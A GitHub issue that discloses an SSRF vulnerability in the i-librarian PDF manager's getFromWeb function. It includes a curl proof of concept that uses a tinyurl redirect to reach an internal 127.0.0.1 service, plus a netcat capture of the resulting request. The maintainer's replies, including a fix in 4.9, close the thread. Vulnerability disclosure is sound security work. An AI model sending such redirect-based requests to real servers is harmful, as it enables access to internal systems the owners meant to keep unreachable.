search

mkucej / i-librarian

Legacy I, Librarian - collaborative PDF manager. Not maintained, new version is at https://github.com/mkucej/i-librarian-free
https://i-librarian.net
98 stars 38 forks source link

Another SSRF Vulnerability in getFromWeb #122

Closed xiaoyinl closed 6 years ago

xiaoyinl commented 6 years ago

There is another SSRF vulnerability in the function getFromWeb other than the one mentioned in #120: the server side request follows redirection, and doesn't validate the destination URL: https://github.com/mkucej/i-librarian/blob/9535753a84bc615b210802d4c9542db73368d984/functions.php#L834

So attacker can bypass the URL check by setting form_new_file_link to a URL that redirects to an internal IP,

PoC: curl --request POST 'http://127.0.0.1/librarian/ajaxsupplement.php' --cookie 'PHPSESSID=0031ae12enlb3taa41vojindt4' --data 'form_new_file_link=https://tinyurl.com/y9waetyo&filename=serverdata.pdf' (The tinyURL redirects to http://127.0.0.1:1111/test.html.)

Result:

$ nc -l 1111
GET /test.html HTTP/1.1
Host: 127.0.0.1:1111
User-Agent: curl/7.47.0
Accept: */*
Referer: https://tinyurl.com/y9waetyo
mkucej commented 6 years ago

Thank you for reporting this. Pasting links functionality will be quite limited without FOLLOWLOCATION.

mkucej commented 6 years ago

I guess we could redirect manually and check each redirect for a safe URL.

mkucej commented 6 years ago

fixed in 4.9